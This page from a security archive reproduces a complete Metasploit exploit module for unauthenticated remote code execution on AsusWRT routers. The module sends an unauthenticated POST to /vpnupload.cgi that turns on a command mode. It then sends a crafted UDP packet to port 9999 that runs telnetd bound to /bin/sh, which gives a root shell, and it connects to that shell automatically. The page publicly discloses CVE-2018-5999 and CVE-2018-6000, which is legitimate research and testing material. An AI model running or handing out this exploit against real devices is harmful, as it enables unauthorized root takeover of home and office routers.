Twenty Year Anniversary

AsusWRT LAN Unauthenticated Remote Code Execution

AsusWRT LAN Unauthenticated Remote Code Execution
Posted Feb 23, 2018
Authored by Pedro Ribeiro | Site metasploit.com

The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a POST in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the POST request to enable a special command mode. This command mode can then be abused by sending a UDP packet to infosvr, which is running on port UDP 9999 to directly execute commands as root. This exploit leverages that to start telnetd in a random port, and then connects to it. It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.

tags | exploit, web, root, udp
advisories | CVE-2018-5999, CVE-2018-6000
MD5 | 0a0cdd7637ea7a4a50df34cad0df396f

AsusWRT LAN Unauthenticated Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Udp

def initialize(info = {})
super(update_info(info,
'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution',
'Description' => %q{
The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to
perform a POST in certain cases. This can be combined with another vulnerability in
the VPN configuration upload routine that sets NVRAM configuration variables directly
from the POST request to enable a special command mode.
This command mode can then be abused by sending a UDP packet to infosvr, which is running
on port UDP 9999 to directly execute commands as root.
This exploit leverages that to start telnetd in a random port, and then connects to it.
It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743.
},
'Author' =>
[
'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://blogs.securiteam.com/index.php/archives/3589'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],
['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'],
['CVE', '2018-5999'],
['CVE', '2018-6000']
],
'Targets' =>
[
[ 'AsusWRT < v3.0.0.4.384.10007',
{
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
}
],
],
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'DisclosureDate' => 'Jan 22 2018',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9999)
])

register_advanced_options(
[
OptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80])
])
end

def exploit
# first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD
# this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting!
post_data = Rex::MIME::Message.new
post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"ateCommand_flag\"")

data = post_data.to_s

res = send_request_cgi({
'uri' => "/vpnupload.cgi",
'method' => 'POST',
'rport' => datastore['ASUSWRTPORT'],
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})

if res and res.code == 200
print_good("#{peer} - Successfully set the ateCommand_flag variable.")
else
fail_with(Failure::Unknown, "#{peer} - Failed to set ateCommand_flag variable.")
end


# ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above.
info_pdu_size = 512 # expected packet size, not sure what the extra bytes are
r = Random.new

ibox_comm_pkt_hdr_ex =
[0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC
[0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15
[0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33
r.bytes(4) + # Info, don't know what this is
r.bytes(6) + # MAC address
r.bytes(32) # Password

telnet_port = rand((2**16)-1024)+1024
cmd = "/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}" + [0x00].pack('C*')
pkt_syscmd =
[cmd.length,0x00].pack('C*') + # cmd length
cmd # our command

pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length)

connect_udp
udp_sock.put(pkt_final) # we could process the response, but we don't care
disconnect_udp

print_status("#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}")
sleep(10)

begin
ctx = { 'Msf' => framework, 'MsfExploit' => self }
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 })
if not sock.nil?
print_good("#{peer} - Success, shell incoming!")
return handler(sock)
end
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
sock.close if sock
end

print_bad("#{peer} - Well that didn't work... try again?")
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

May 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    17 Files
  • 3
    May 3rd
    30 Files
  • 4
    May 4th
    29 Files
  • 5
    May 5th
    2 Files
  • 6
    May 6th
    3 Files
  • 7
    May 7th
    13 Files
  • 8
    May 8th
    27 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    15 Files
  • 11
    May 11th
    8 Files
  • 12
    May 12th
    2 Files
  • 13
    May 13th
    8 Files
  • 14
    May 14th
    7 Files
  • 15
    May 15th
    43 Files
  • 16
    May 16th
    19 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    3 Files
  • 20
    May 20th
    7 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    40 Files
  • 23
    May 23rd
    61 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close